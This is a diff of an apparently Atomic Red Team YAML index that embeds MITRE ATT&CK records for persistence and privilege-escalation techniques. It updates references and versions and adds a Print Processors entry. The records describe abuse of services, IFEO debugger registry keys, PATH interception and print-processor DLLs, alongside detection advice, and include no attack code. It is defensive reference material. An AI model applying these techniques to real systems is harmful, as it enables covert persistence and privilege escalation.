- to create or modify system processes in order to escalate privileges. (Citation:
- OSX Malware Detection). "
- name: Create or Modify System Process
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1543
@@ -10819,10 +11094,42 @@ persistence:
description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical
OS X Malware Detection & Analysis. Retrieved July 10, 2017.'
source_name: OSX Malware Detection
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Create or Modify System Process
+ description: "Adversaries may create or modify system-level processes to repeatedly
+ execute malicious payloads as part of persistence. When operating systems
+ boot up, they can start processes that perform background system functions.
+ On Windows and Linux, these system processes are referred to as services.
+ (Citation: TechNet Services) On macOS, launchd processes known as [Launch
+ Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001)
+ are run to finish system initialization and load user specific parameters.(Citation:
+ AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services,
+ daemons, or agents that can be configured to execute at startup or a repeatable
+ interval in order to establish persistence. Similarly, adversaries may modify
+ existing services, daemons, or agents to achieve the same effect. \n\nServices,
+ daemons, or agents may be created with administrator privileges but executed
+ under root/SYSTEM privileges. Adversaries may leverage this functionality
+ to create or modify system processes in order to escalate privileges. (Citation:
+ OSX Malware Detection). "
+ id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ modified: '2020-10-09T13:46:29.922Z'
+ created: '2020-01-10T16:03:18.865Z'
+ x_mitre_data_sources:
+ - Windows event logs
+ - Windows Registry
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_detection: "Monitor for changes to system processes that do not correlate
with known software, patch cycles, etc., including by comparing results against
a trusted system baseline. New, benign system processes may be created during
@@ -10835,14 +11142,10 @@ persistence:
process call trees from known services and for execution of other commands
that could relate to Discovery or other adversary techniques. \n\nMonitor
for changes to files associated with system-level processes."
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Windows event logs
- - Windows Registry
- - File monitoring
- - Process command-line parameters
- - Process monitoring
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
atomic_tests: []
T1053.003:
technique:
@@ -11081,9 +11384,9 @@ persistence:
- source_name: mitre-attack
external_id: T1574.002
url: https://attack.mitre.org/techniques/T1574/002
- - external_id: CAPEC-capec
+ - external_id: CAPEC-641
source_name: capec
- url: https://capec.mitre.org/data/definitions/capec.html
+ url: https://capec.mitre.org/data/definitions/641.html
- source_name: About Side by Side Assemblies
url: https://docs.microsoft.com/en-us/windows/win32/sbscs/about-side-by-side-assemblies-
description: Microsoft. (2018, May 31). About Side-by-Side Assemblies. Retrieved
@@ -11111,7 +11414,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:05:42.513Z'
+ modified: '2020-10-17T15:15:27.807Z'
created: '2020-03-13T19:41:37.908Z'
x_mitre_defense_bypassed:
- Anti-virus
@@ -11170,6 +11473,9 @@ persistence:
- source_name: mitre-attack
external_id: T1078.001
url: https://attack.mitre.org/techniques/T1078/001
+ - external_id: CAPEC-70
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/70.html
- source_name: Microsoft Local Accounts Feb 2019
url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts
description: Microsoft. (2018, December 9). Local Accounts. Retrieved February
@@ -11196,9 +11502,9 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:37:34.567Z'
+ modified: '2020-09-16T19:41:43.491Z'
created: '2020-03-13T20:15:31.974Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
@@ -11349,31 +11655,13 @@ persistence:
elevation_required: false
T1078.002:
technique:
- created: '2020-03-13T20:21:54.758Z'
- modified: '2020-03-23T21:08:40.063Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- type: attack-pattern
- id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
- description: |-
- Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
-
- Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
- name: Domain Accounts
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.002
url: https://attack.mitre.org/techniques/T1078/002
+ - external_id: CAPEC-560
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/560.html
- url: https://technet.microsoft.com/en-us/library/dn535501.aspx
description: Microsoft. (2016, April 15). Attractive Accounts for Credential
Theft. Retrieved June 3, 2016.
@@ -11386,22 +11674,43 @@ persistence:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Authentication logs
- - Process monitoring
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Domain Accounts
+ description: |-
+ Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
+
+ Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
+ id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ modified: '2020-09-16T19:42:11.787Z'
+ created: '2020-03-13T20:21:54.758Z'
+ x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1574.004:
technique:
@@ -11420,9 +11729,9 @@ persistence:
- source_name: mitre-attack
external_id: T1574.004
url: https://attack.mitre.org/techniques/T1574/004
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-471
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/471.html
- url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf
description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved
July 10, 2017.
@@ -11439,7 +11748,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:06:47.115Z'
+ modified: '2020-09-16T16:48:09.391Z'
created: '2020-03-16T15:23:30.896Z'
x_mitre_platforms:
- macOS
@@ -11537,6 +11846,18 @@ persistence:
- source_name: mitre-attack
external_id: T1546
url: https://attack.mitre.org/techniques/T1546
+ - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
+ description: Ballenthin, W., et al. (2015). Windows Management Instrumentation
+ (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.
+ source_name: FireEye WMI 2015
+ - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf
+ description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite.
+ Retrieved July 10, 2017.
+ source_name: Malware Persistence on OS X
+ - url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux
+ Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018.
+ source_name: amnesia malware
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -11548,8 +11869,9 @@ persistence:
may abuse these mechanisms as a means of maintaining persistent access to
a victim via repeatedly executing malicious code. After gaining access to
a victim system, adversaries may create/modify event triggers to point to
- malicious content that will be executed whenever the event trigger is invoked.
- \n\nSince the execution can be proxied by an account with higher permissions,
+ malicious content that will be executed whenever the event trigger is invoked.(Citation:
+ FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia
+ malware)\n\nSince the execution can be proxied by an account with higher permissions,
such as SYSTEM or service accounts, an adversary may be able to abuse these
triggered execution mechanisms to escalate their privileges. "
id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db
@@ -11559,9 +11881,9 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-07-09T13:55:51.501Z'
+ modified: '2020-10-21T18:48:27.576Z'
created: '2020-01-22T21:04:23.285Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: false
x_mitre_detection: "Monitoring for additions or modifications of mechanisms
that could be used to trigger event-based execution, especially the addition
@@ -11678,7 +12000,7 @@ persistence:
Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
- Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
+ Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979
type: attack-pattern
kill_chain_phases:
@@ -11830,7 +12152,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-26T16:09:59.324Z'
+ modified: '2020-10-17T15:15:28.288Z'
created: '2020-03-12T20:38:12.465Z'
x_mitre_data_sources:
- Environment variable
@@ -11960,11 +12282,11 @@ persistence:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Image File Execution Options Injection
description: |-
- Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IEFO) debuggers. IEFOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)
+ Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
- IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
+ IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
@@ -11978,15 +12300,15 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T19:39:50.839Z'
+ modified: '2020-08-26T14:18:08.480Z'
created: '2020-01-24T15:05:58.384Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
- SYSTEM
x_mitre_detection: |-
- Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)
+ Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)
Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)
x_mitre_data_sources:
@@ -12329,6 +12651,12 @@ persistence:
- source_name: mitre-attack
external_id: T1574.006
url: https://attack.mitre.org/techniques/T1574/006
+ - external_id: CAPEC-13
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/13.html
+ - external_id: CAPEC-640
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/640.html
- source_name: Man LD.SO
url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html
description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved
@@ -12358,7 +12686,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-15T21:59:25.358Z'
+ modified: '2020-09-16T16:49:46.904Z'
created: '2020-03-13T20:09:59.569Z'
x_mitre_platforms:
- Linux
@@ -12371,7 +12699,7 @@ persistence:
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
@@ -12640,6 +12968,12 @@ persistence:
- source_name: mitre-attack
external_id: T1543.004
url: https://attack.mitre.org/techniques/T1543/004
+ - external_id: CAPEC-550
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/550.html
+ - external_id: CAPEC-551
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/551.html
- url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved
July 10, 2017.
@@ -12686,11 +13020,11 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T22:27:49.609Z'
+ modified: '2020-09-16T15:46:44.130Z'
created: '2020-01-17T19:23:15.227Z'
x_mitre_data_sources:
- File monitoring
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_effective_permissions:
- root
@@ -13841,62 +14175,55 @@ persistence:
atomic_tests: []
T1574.007:
technique:
- id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
+ created: '2020-03-13T14:10:43.424Z'
+ modified: '2020-09-16T16:56:34.583Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1574.007
+ url: https://attack.mitre.org/techniques/T1574/007
+ - external_id: CAPEC-13
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/13.html
+ - external_id: CAPEC-38
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/38.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Path Interception by PATH Environment Variable
description: |-
Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.
- name: Path Interception by PATH Environment Variable
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1574.007
- url: https://attack.mitre.org/techniques/T1574/007
- - external_id: CAPEC-capec
- source_name: capec
- url: https://capec.mitre.org/data/definitions/capec.html
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-06-20T22:02:40.983Z'
- created: '2020-03-13T14:10:43.424Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Stefan Kanthak
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
+ id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
+ x_mitre_defense_bypassed:
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: |-
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Application control
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1574.008:
technique:
- created: '2020-03-13T17:48:58.999Z'
- modified: '2020-03-26T20:03:27.496Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- type: attack-pattern
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -13914,9 +14241,9 @@ persistence:
- source_name: mitre-attack
external_id: T1574.008
url: https://attack.mitre.org/techniques/T1574/008
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-159
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/159.html
- url: http://msdn.microsoft.com/en-us/library/ms682425
description: Microsoft. (n.d.). CreateProcess function. Retrieved December
5, 2014.
@@ -13932,6 +14259,16 @@ persistence:
url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
description: Microsoft. (2011, October 24). Environment Property. Retrieved
July 27, 2016.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-09-17T19:03:35.217Z'
+ created: '2020-03-13T17:48:58.999Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -13956,23 +14293,13 @@ persistence:
atomic_tests: []
T1574.009:
technique:
- created: '2020-03-13T13:51:58.519Z'
- modified: '2020-03-26T19:55:39.867Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1574.009
url: https://attack.mitre.org/techniques/T1574/009
- - external_id: CAPEC-capec
+ - external_id: CAPEC-38
source_name: capec
- url: https://capec.mitre.org/data/definitions/capec.html
+ url: https://capec.mitre.org/data/definitions/38.html
- source_name: Microsoft CurrentControlSet Services
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services
@@ -14000,7 +14327,17 @@ persistence:
This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
- x_mitre_version: '1.0'
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-09-17T19:05:23.755Z'
+ created: '2020-03-13T13:51:58.519Z'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_detection: |-
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -14176,9 +14513,9 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-07-01T18:23:25.002Z'
+ modified: '2020-10-21T01:26:31.804Z'
created: '2020-07-01T18:23:25.002Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- User
@@ -14191,6 +14528,7 @@ persistence:
- Linux
- macOS
- Windows
+ - Network
atomic_tests: []
T1547.010:
technique:
@@ -14405,11 +14743,12 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-05-19T21:22:38.174Z'
+ modified: '2020-10-22T16:35:54.740Z'
created: '2019-11-13T14:44:49.439Z'
x_mitre_platforms:
- Linux
- Windows
+ - Network
x_mitre_data_sources:
- VBR
- MBR
@@ -14426,13 +14765,125 @@ persistence:
- Anti-virus
- Host intrusion prevention systems
- File monitoring
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_detection: |-
Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)
x_mitre_is_subtechnique: false
atomic_tests: []
+ T1547.012:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1547.012
+ url: https://attack.mitre.org/techniques/T1547/012
+ - source_name: Microsoft AddPrintProcessor May 2018
+ url: https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor
+ description: Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved
+ October 5, 2020.
+ - source_name: ESET PipeMon May 2020
+ url: https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
+ description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
+ Group. Retrieved August 24, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Print Processors
+ description: "Adversaries may abuse print processors to run malicious DLLs during
+ system boot for persistence and/or privilege escalation. Print processors
+ are DLLs that are loaded by the print spooler service, spoolsv.exe, during
+ boot. \n\nAdversaries may abuse the print spooler service by adding print
+ processors that load malicious DLLs at startup. A print processor can be installed
+ through the AddPrintProcessor API call with an account that has
+ SeLoadDriverPrivilege enabled. Alternatively, a print processor
+ can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet
+ or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture:
+ e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry
+ key that points to the DLL. For the print processor to be correctly installed,
+ it must be located in the system print-processor directory that can be found
+ with the GetPrintProcessorDirectory API call.(Citation: Microsoft
+ AddPrintProcessor May 2018) After the print processors are installed, the
+ print spooler service, which starts during boot, must be restarted in order
+ for them to run.(Citation: ESET PipeMon May 2020) The print spooler service
+ runs under SYSTEM level permissions, therefore print processors installed
+ by an adversary may run under elevated privileges."
+ id: attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ modified: '2020-10-09T16:05:36.344Z'
+ created: '2020-10-05T13:24:49.780Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
